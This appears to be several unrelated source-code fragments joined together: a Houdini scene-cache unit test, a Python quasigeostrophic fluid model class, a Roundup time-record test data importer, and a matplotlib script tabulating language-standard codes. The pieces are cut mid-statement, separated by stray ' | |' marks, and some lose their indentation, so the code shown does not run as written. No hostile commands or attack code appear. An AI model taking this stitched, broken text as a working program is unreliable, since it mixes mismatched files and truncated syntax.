        switch = obj.renderNode().createOutputNode( "switch" )
        switch.setInput( 1, delete )
        # route through the delete branch before frame 5
        switch.parm( "input" ).setExpression( "if hou.frame() >= 5 :\n\treturn 0\nelse :\n\treturn 1", hou.exprLanguage.Python )
        switch.setRenderFlag( True )
        rop = self.rop( obj )
        rop.parm( "trange" ).set( 1 )
        rop.parm( "f1" ).set( 1 )
        rop.parm( "f2" ).set( 20 )
        rop.parm( "execute" ).pressButton()
        output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
        a = output.child( "1" )
        b = a.child( "2" )
        c = b.child( "3" )
        attr = "scene:visible"
        # only the deepest location carries a visibility attribute
        self.assertFalse( a.hasAttribute( attr ) )
        self.assertFalse( b.hasAttribute( attr ) )
        self.assertTrue( c.hasAttribute( attr ) )
        # hidden at the early samples, visible afterwards
        self.assertEqual( c.readAttribute( attr, 0 ), IECore.BoolData( False ) )
        self.assertEqual( c.readAttribute( attr, 0.2083 ), IECore.BoolData( False ) )
        self.assertEqual( c.readAttribute( attr, 0.2084 ), IECore.BoolData( True ) )
        self.assertEqual( c.readAttribute( attr, 1 ), IECore.BoolData( True ) )
        del output, a, b, c
        IECore.SharedSceneInterfaces.clear()
        # make sure it can appear and disappear correctly
        switch.parm( "input" ).setExpression( "if hou.frame() < 5 or hou.frame() >= 10 :\n\treturn 1\nelse :\n\treturn 0", hou.exprLanguage.Python )
        rop.parm( "execute" ).pressButton()
        # NOTE(review): this hip save looks like a debugging leftover --
        # confirm whether /tmp/bunk.hip is needed by anything.
        hou.hipFile.save( "/tmp/bunk.hip" )
        output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
        a = output.child( "1" )
        b = a.child( "2" )
        c = b.child( "3" )
        self.assertFalse( a.hasAttribute( attr ) )
        self.assertFalse( b.hasAttribute( attr ) )
        self.assertTrue( c.hasAttribute( attr ) )
        # visible only for the middle band of samples
        self.assertEqual( c.readAttribute( attr, 0 ), IECore.BoolData( False ) )
        self.assertEqual( c.readAttribute( attr, 0.2083 ), IECore.BoolData( False ) )
        self.assertEqual( c.readAttribute( attr, 0.2084 ), IECore.BoolData( True ) )
        self.assertEqual( c.readAttribute( attr, 0.3 ), IECore.BoolData( True ) )
        self.assertEqual( c.readAttribute( attr, 0.4167 ), IECore.BoolData( False ) )
        self.assertEqual( c.readAttribute( attr, 1 ), IECore.BoolData( False ) )
    def testLiveScene( self ) :
        """Expand a tagged cache via a mix of SubNetworks and FlatGeometry
        hierarchies, then verify the LiveScene view of the network matches
        the original cache ("3" is baked into flat geometry)."""
        self.writeTaggedSCC()
        xform = self.xform()
        xform.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.SubNetworks )
        xform.parm( "depth" ).set( IECoreHoudini.SceneCacheNode.Depth.Children )
        xform.parm( "expand" ).pressButton()
        a = xform.children()[0]
        a.parm( "expand" ).pressButton()
        # collapse the second child down to flat geometry
        b = a.children()[1]
        b.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.FlatGeometry )
        b.parm( "depth" ).set( IECoreHoudini.SceneCacheNode.Depth.AllDescendants )
        b.parm( "expand" ).pressButton()
        orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
        live = IECoreHoudini.LiveScene( xform.path(), rootPath = [ xform.name() ] )
        self.compareScene( orig, live, bakedObjects = [ "3" ] )
def testTopologyChanges( self ) :
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
box = IECore.MeshPrimitive.createBox( IECore.Box3f( IECore.V3f( 0 ), IECore.V3f( 1 ) ) )
box["Cd"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Uniform, IECore.Color3fVectorData( [ IECore.Color3f( 1, 0, 0 ) ] * box.variableSize( IECore.PrimitiveVariable.Interpolation.Uniform ) ) )
box2 = IECore.MeshPrimitive.createBox( IECore.Box3f( IECore.V3f( 2 ), IECore.V3f( 3 ) ) )
box2["Cd"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Uniform, IECore.Color3fVectorData( [ IECore.Color3f( 0, 1, 0 ) ] * box.variableSize( IECore.PrimitiveVariable.Interpolation.Uniform ) ) )
s = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Write )
a = s.createChild( "a" )
b = a.createChild( "b" )
c = a.createChild( "c" )
d = a.createChild( "d" )
# animated topology
b.writeObject( box, 0 )
b.writeObject( plane, 1 )
# static
c.writeObject( box, 0 )
c.writeObject( box, 1 )
# animated P and Cd
d.writeObject( box, 0 )
d.writeObject( box2, 1 )
del s, a, b, c, d
spf = 1.0 / hou.fps()
hou.setTime( 0 - spf )
node = self.sop()
node.parm( "geometryType" ).set( IECoreHoudini.SceneCacheNode.GeometryType.Houdini )
prims = node.geometry().prims()
self.assertEqual( len(prims), 18 )
self.assertEqual( len(node.geometry().points()), 24 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 6 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( bPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( cPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( dPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
hou.setTime( 1 - spf )
prims = node.geometry().prims()
self.assertEqual( len(prims), 13 )
self.assertEqual( len(node.geometry().points()), 20 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 1 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( -1, 1, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 2, 2, 2 ) )
self.assertEqual( bPrims[0].attribValue( "Cd" ), ( 0, 0, 0 ) )
self.assertEqual( cPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( dPrims[0].attribValue( "Cd" ), ( 0, 1, 0 ) )
hou.setTime( 0.5 - spf )
prims = node.geometry().prims()
self.assertEqual( len(prims), 13 )
self.assertEqual( len(node.geometry().points()), 20 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 1 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( -1, 1, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 1, 1, 1 ) | |
import numpy as np
from numpy import pi
import logging
import h5py
from numpy import pi
import logging, os
from .Diagnostics import *
from .Saving import *
class Model(object):
""" Python class that represents the barotropic quasigeostrophic
pseudospectral model in a doubly periodic domain. Physical parameters
observe SI units.
Parameters
-----------
nx: integer (optional)
Number of grid points in the x-direction.
The number of modes is nx/2+1.
ny: integer (optional)
Number of grid points in the y-direction.
If None, then ny=nx.
L: float (optional)
Domain size.
dt: float (optional)
Time step for time integration.
twrite: integer (optional)
Print model status to screen every twrite time steps.
tmax: float (optional)
Total time of simulation.
U: float (optional)
Uniform zonal flow
use_filter: bool (optional)
If True, then uses exponential spectral filter.
nu4: float (optional)
Fourth-order hyperdiffusivity of potential vorticity.
nu: float (optional)
Diffusivity of potential vorticity.
mu: float (optional)
Linear drag of potential vorticity.
passive_scalar: bool (optional)
If True, then calculates passive scalar solution.
nu4c: float (optional)
Fourth-order hyperdiffusivity of passive scalar.
nuc: float (optional)
Diffusivity of passive scalar.
muc: float (optional)
Linear drag of passive scalar.
dealias: bool (optional)
If True, then dealias solution using 2/3 rule.
save_to_disk: bool (optional)
If True, then save parameters and snapshots to disk.
overwrite: bool (optional)
If True, then overwrite extant files.
tsave_snapshots: integer (optional)
Save snapshots every tsave_snapshots time steps.
tdiags: integer (optional)
Calculate diagnostics every tdiags time steps.
path: string (optional)
Location for saving output files.
"""
def __init__(
self,
nx=128,
ny=None,
L=5e5,
dt=10000.,
twrite=1000,
tswrite=10,
tmax=250000.,
use_filter = True,
U = .0,
nu4=5.e9,
nu = 0,
mu = 0,
beta = 0,
passive_scalar = False,
nu4c = 5.e9,
nuc = 0,
muc = 0,
dealias = False,
save_to_disk=False,
overwrite=True,
tsave_snapshots=10,
tdiags = 10,
path = 'output/',
use_mkl=False,
nthreads=1):
self.nx = nx
self.ny = nx
self.L = L
self.W = L
self.dt = dt
self.twrite = twrite
self.tswrite = tswrite
self.tmax = tmax
self.tdiags = tdiags
self.passive_scalar = passive_scalar
self.dealias = dealias
self.U = U
self.beta = beta
self.nu4 = nu4
self.nu = nu
self.mu = mu
self.nu4c = nu4c
self.nuc = nuc
self.muc = muc
self.save_to_disk = save_to_disk
self.overwrite = overwrite
self.tsnaps = tsave_snapshots
self.path = path
self.use_filter = use_filter
self.use_mkl = use_mkl
self.nthreads = nthreads
self._initialize_logger()
self._initialize_grid()
self._allocate_variables()
self._initialize_filter()
self._initialize_etdrk4()
self._initialize_time()
initialize_save_snapshots(self, self.path)
save_setup(self, )
self.cflmax = .5
self._initialize_fft()
self._initialize_diagnostics()
def _allocate_variables(self):
""" Allocate variables so that variable addresses are close in memory.
"""
self.dtype_real = np.dtype('float64')
self.dtype_cplx = np.dtype('complex128')
self.shape_real = (self.ny, self.nx)
self.shape_cplx = (self.ny, self.nx//2+1)
# vorticity
self.q = np.zeros(self.shape_real, self.dtype_real)
self.qh = np.zeros(self.shape_cplx, self.dtype_cplx)
self.qh0 = np.zeros(self.shape_cplx, self.dtype_cplx)
self.qh1 = np.zeros(self.shape_cplx, self.dtype_cplx)
# stream function
self.p = np.zeros(self.shape_real, self.dtype_real)
self.ph = np.zeros(self.shape_cplx, self.dtype_cplx)
def run_with_snapshots(self, tsnapstart=0., tsnapint=432000.):
""" Run the model for prescribed time and yields to user code.
Parameters
----------
tsnapstart : float
The timestep at which to begin yielding.
tstapint : int (number of time steps)
The interval at which to yield.
"""
tsnapints = np.ceil(tsnapint/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapints)==0:
yield self.t
return
def run(self):
""" Run the model until the end (`tmax`).
The algorithm is:
1) Save snapshots (i.e., save the initial condition).
2) Take a tmax/dt steps forward.
3) Save diagnostics.
"""
# save initial conditions
if self.save_to_disk:
if self.passive_scalar:
save_snapshots(self,fields=['t','q','c'])
else:
save_snapshots(self,fields=['t','q'])
# run the model
while(self.t < self.tmax):
self._step_forward()
# save diagnostics
if self.save_to_disk:
save_diagnostics(self)
def _step_forward(self):
""" Step solutions forwards. The algorithm is:
1) Take one time step with ETDRK4 scheme.
2) Incremente diagnostics.
3) Print status.
4) Save snapshots.
"""
self._step_etdrk4()
increment_diagnostics(self,)
self._print_status()
save_snapshots(self,fields=['t','q','c'])
def _initialize_time(self):
""" Initialize model clock and other time variables.
"""
self.t=0 # time
self.tc=0 # time-step number
### initialization routines, only called once at the beginning ###
def _initialize_grid(self):
""" Create spatial and spectral grids and normalization constants.
"""
self.x,self.y = np.meshgrid(
np.arange(0.5,self.nx,1.)/self.nx*self.L,
np.arange(0.5,self.ny,1.)/self.ny*self.W )
self.dk = 2.*pi/self.L
self.dl = 2.*pi/self.L
# wavenumber grids
self.nl = self.ny
self.nk = self.nx//2+1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# physical grid spacing
self.dx = self.L / self.nx
self.dy = self.W / self.ny
# constant for spectral normalizations
self.M = self.nx*self.ny
# isotropic wavenumber^2 grid
# the inversion is not defined at kappa = 0
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
self.wv4 = self.wv2**2
iwv2 = self.wv2 != 0.
self.wv2i = np.zeros_like(self.wv2)
self.wv2i[iwv2] = self.wv2[iwv2]**-1
    def _initialize_background(self):
        """Set up the background state; must be provided by a subclass."""
        raise NotImplementedError(
            'needs to be implemented by Model subclass')
    def _initialize_inversion_matrix(self):
        """Build the PV-inversion operator; must be provided by a subclass."""
        raise NotImplementedError(
            'needs to be implemented by Model subclass')
def _initialize_forcing(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_filter(self):
"""Set up spectral filter or dealiasing."""
if self.use_filter:
cphi=0.65*pi
wvx=np.sqrt((self.k*self.dx)**2.+(self.l*self.dy)**2.)
self.filtr = np.exp(-23.6*(wvx-cphi)**4.)
self.filtr[wvx<=cphi] = 1.
self.logger.info(' Using filter')
elif self.dealias:
self.filtr = np.ones_like(self.wv2)
self.filtr[self.nx/3:2*self.nx/3,:] = 0.
self.filtr[:,self.ny/3:2*self.ny/3] = 0.
self.logger.info(' Dealiasing with 2/3 rule')
else:
self.filtr = np.ones_like(self.wv2)
self.logger.info(' No dealiasing; no filter')
    def _do_external_forcing(self):
        """Per-step hook for external forcing; a no-op in this base class.

        Subclasses presumably override this to inject forcing each step.
        """
        pass
def _initialize_logger(self):
""" Initialize logger.
"""
self.logger = logging.getLogger(__name__)
fhandler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)s: %(message)s')
fhandler.setFormatter(formatter)
if not self.logger.handlers:
self.logger.addHandler(fhandler)
self.logger.setLevel(10)
# this prevents the logger from propagating into the ipython notebook log
self.logger.propagate = False
self.logger.info(' Logger initialized')
    def _step_etdrk4(self):
        """ Take one step forward using an exponential time-differencing
        method with a Runge-Kutta 4 scheme.

        Advances the spectral vorticity qh (and the passive scalar ch,
        when active) through the four ETDRK4 substages, then accumulates
        the kinetic-energy and scalar-variance budgets (Ke, cvar) with
        Simpson-like weights (x1 + 2*(x2+x3) + x4)/6 over the substages.

        References
        ----------
        See Cox and Matthews, J. Comp. Physics., 176(2):430-455, 2002.
        Kassam and Trefethen, SIAM J. Sci. Comput., 26(4):1214-1233, 2005.
        """
        # --- substage 1: half exponential step from the state at t_n ---
        self.qh0 = self.qh.copy()
        Fn0 = -self.jacobian_psi_q()
        self.qh = (self.expch_h*self.qh0 + Fn0*self.Qh)*self.filtr
        self.qh1 = self.qh.copy()
        if self.passive_scalar:
            self.ch0 = self.ch.copy()
            Fn0c = -self.jacobian_psi_c()
            self.ch = (self.expch_hc*self.ch0 + Fn0c*self.Qhc)*self.filtr
            self.ch1 = self.ch.copy()
            self._calc_derived_fields()
            c1 = self._calc_ep_c()
        self._invert()
        k1 = self._calc_ep_psi()
        # --- substage 2: half step using the nonlinear term at stage a ---
        Fna = -self.jacobian_psi_q()
        self.qh = (self.expch_h*self.qh0 + Fna*self.Qh)*self.filtr
        if self.passive_scalar:
            Fnac = -self.jacobian_psi_c()
            self.ch = (self.expch_hc*self.ch0 + Fnac*self.Qhc)*self.filtr
            self._calc_derived_fields()
            c2 = self._calc_ep_c()
        self._invert()
        k2 = self._calc_ep_psi()
        # --- substage 3: half step from the stage-1 state ---
        Fnb = -self.jacobian_psi_q()
        self.qh = (self.expch_h*self.qh1 + ( 2.*Fnb - Fn0 )*self.Qh)*self.filtr
        if self.passive_scalar:
            Fnbc = -self.jacobian_psi_c()
            self.ch = (self.expch_hc*self.ch1 + ( 2.*Fnbc - Fn0c )*self.Qhc)*self.filtr
            self._calc_derived_fields()
            c3 = self._calc_ep_c()
        self._invert()
        k3 = self._calc_ep_psi()
        # --- final combination: full step with the f0/fab/fc weights ---
        Fnc = -self.jacobian_psi_q()
        self.qh = (self.expch*self.qh0 + Fn0*self.f0 + 2.*(Fna+Fnb)*self.fab\
                + Fnc*self.fc)*self.filtr
        if self.passive_scalar:
            Fncc = -self.jacobian_psi_c()
            self.ch = (self.expchc*self.ch0 + Fn0c*self.f0c+ 2.*(Fnac+Fnbc)*self.fabc\
                + Fncc*self.fcc)*self.filtr
            self._calc_derived_fields()
            c4 = self._calc_ep_c()
            # scalar-variance budget, Simpson weights over the substages
            self.cvar += self.dt*(c1 + 2*(c2+c3) + c4)/6.
        # invert
        self._invert()
        # calculate q in physical space from the updated spectral field
        self.q = self.ifft(self.qh).real
        if self.passive_scalar:
            self.c = self.ifft(self.ch).real
        k4 = self._calc_ep_psi()
        # kinetic-energy budget, Simpson weights over the substages
        self.Ke += self.dt*(k1 + 2*(k2+k3) + k4)/6.
def _initialize_etdrk4(self):
""" Compute coefficients of the exponential time-dfferencing method
with a Runge-Kutta 4 scheme.
Rereferences
------------
See Cox and Matthews, J. Comp. Physics., 176(2):430-455, 2002.
Kassam and Trefethen, IAM J. Sci. Comput., 26(4):1214-233, 2005.
"""
#
# coefficients for q-equation
#
# the exponent for the linear part
c = np.zeros((self.nl,self.nk),self.dtype_cplx)
c += -self.nu4*self.wv4 - self.nu*self.wv2 - self.mu - 1j*self.k*self.U
c += self.beta*self.ik*self.wv2i
ch = c*self.dt
self.expch = np.exp(ch)
self.expch_h = np.exp(ch/2.)
self.expch2 = np.exp(2.*ch)
M = 32. # number of points for line integral in the complex plane
rho = 1. # radius for complex integration
r = rho*np.exp(2j*np.pi*((np.arange(1.,M+1))/M)) # roots for integral
LR = ch[...,np.newaxis] + r[np.newaxis,np.newaxis,...]
LR2 = LR*LR
LR3 = LR2*LR
self.Qh = self.dt*(((np.exp(LR/2.)-1.)/LR).mean(axis=-1))
self.f0 = self.dt*( ( ( -4. - LR + ( np.exp(LR)*( 4. - 3.*LR + LR2 ) ) )/ LR3 ).mean(axis=-1) )
self.fab = self.dt*( ( ( 2. + LR + np.exp(LR)*( -2. + LR ) )/ LR3 ).mean(axis=-1) )
self.fc = self.dt*( ( ( -4. -3.*LR - LR2 + np.exp(LR)*(4.-LR) )/ LR3 ).mean(axis=-1) )
if self.passive_scalar:
#
# coefficients for c-equation
#
# the exponent for the linear part
c = np.zeros((self.nl,self.nk),self.dtype_cplx)
c += -self.nu4c*self.wv4 - self.nuc*self.wv2 - self.muc
ch = c*self.dt
self.expchc = np.exp(ch)
self.expch_hc = np.exp(ch/2.)
self.expch2c = np.exp(2.*ch)
r = rho*np.exp(2j*np.pi*((np.arange(1.,M+1))/M)) # roots for integral
LR = ch[...,np.newaxis] + r[np.newaxis,np.newaxis,...]
LR2 = LR*LR
LR3 = LR2*LR
self.Qhc = self.dt*(((np.exp(LR/2.)-1.)/LR).mean(axis=-1))
self.f0c = self.dt*( ( ( -4. - LR | |
<filename>test/user4_time.py
from roundup import date
def import_data_4 (db, user) :
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-18')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-19')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-20')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-21')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-22')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-23')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-06-24')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-13')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-14')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-15')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-16')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-17')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-18')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-08-19')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-02')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-03')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-04')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-05')
)
db.time_record.create \
( daily_record = dr
, duration = 8.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-06')
)
db.time_record.create \
( daily_record = dr
, duration = 7.25
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-07')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-08')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-09')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-10')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-11')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-12')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-13')
)
db.time_record.create \
( daily_record = dr
, duration = 6.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-14')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-15')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-16')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-17')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-18')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-19')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-20')
)
db.time_record.create \
( daily_record = dr
, duration = 8.25
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-21')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-22')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-23')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-24')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-25')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-26')
)
db.time_record.create \
( daily_record = dr
, duration = 8.0
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-27')
)
db.time_record.create \
( daily_record = dr
, duration = 8.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-28')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-29')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-30')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-01-31')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-01')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-02')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-03')
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-04')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-05')
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-06')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-07')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2012-02-08')
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date | |
import logging
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from django.conf import settings
from .map_table_tmplate import reading_2_5, indexes_dict
# from .models import MapStudentProfile, MapProfileExtResults, MapTestCheckItem
log = logging.getLogger("map_profile")
def draw_map_table(map_pro):
phone_number = map_pro.phone_number
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号
# Prepare table
columns = ('Number', 'Domain', 'Items', 'GK', 'G1', 'G2', 'G3', 'G4', 'G5')
cell_text = [
["1", "Language Standards(K-5)", "Conventions of Standard English", "L.K.1", "L.1.1", "L.2.1", "L.3.1",
"L.4.1", "L.5.1"],
["", "", "", "L.K.1.A", "L.1.1.A", "L.2.1.A", "L.3.1.A", "L.4.1.A", "L.5.1.A"],
["", "", "", "L.K.1.B", "L.1.1.B", "L.2.1.B", "L.3.1.B", "L.4.1.B", "L.5.1.B"],
["", "", "", "L.K.1.C", "L.1.1.C", "L.2.1.C", "L.3.1.C", "L.4.1.C", "L.5.1.C"],
["", "", "", "L.K.1.D", "L.1.1.D", "L.2.1.D", "L.3.1.D", "L.4.1.D", "L.5.1.D"],
["", "", "", "L.K.1.E", "L.1.1.E", "L.2.1.E", "L.3.1.E", "L.4.1.E", "L.5.1.E"],
["", "", "", "L.K.1.F", "L.1.1.F", "L.2.1.F", "L.3.1.F", "L.4.1.F", ""],
["", "", "", "", "L.1.1.G", "", "L.3.1.G", "L.4.1.G", ""],
["", "", "", "", "L.1.1.H", "", "L.3.1.H", "", ""],
["", "", "", "", "L.1.1.I", "", "L.3.1.I", "", ""],
["", "", "", "", "L.1.1.J", "", "", "", ""],
["", "", "", "L.K.2", "L.1.2", "L.2.2", "L.3.2", "L.4.2", "L.5.2"],
["", "", "", "L.K.2.A", "L.1.2.A", "L.2.2.A", "L.3.2.A", "L.4.2.A", "L.5.2.A"],
["", "", "", "L.K.2.B", "L.1.2.B", "L.2.2.B", "L.3.2.B", "L.4.2.B", "L.5.2.B"],
["", "", "", "L.K.2.C", "L.1.2.C", "L.2.2.C", "L.3.2.C", "L.4.2.C", "L.5.2.C"],
["", "", "", "L.K.2.D", "L.1.2.D", "L.2.2.D", "L.3.2.D", "L.4.2.D", "L.5.2.D"],
["", "", "", "", "L.1.2.E", "L.2.2.E", "L.3.2.E", "", "L.5.2.E"],
["", "", "", "", "", "", "L.3.2.F", "", ""],
["", "", "", "", "", "", "L.3.2.G", "", ""],
["", "", "Knowledge of Language", "L.K.3", "L.K.3", "L.2.3", "L.3.3", "L.4.3", "L.5.3"],
["", "", "", "", "", "L.2.3.A", "L.3.3.A", "L.4.3.A", "L.5.3.A"],
["", "", "", "", "", "", "L.3.3.B", "L.4.3.B", "L.5.3.B"],
["", "", "", "", "", "", "", "L.4.3.C", ""],
["", "", "Vocabulary Acquisition and Use", "L.K.4", "L.1.4", "L.2.4", "L.3.4", "L.4.4", "L.5.4"],
["", "", "", "L.K.4.A", "L.1.4.A", "L.2.4.A", "L.3.4.A", "L.4.4.A", "L.5.4.A"],
["", "", "", "L.K.4.B", "L.1.4.B", "L.2.4.B", "L.3.4.B", "L.4.4.B", "L.5.4.B"],
["", "", "", "", "L.1.4.C", "L.2.4.C", "L.3.4.C", "L.4.4.C", "L.5.4.C"],
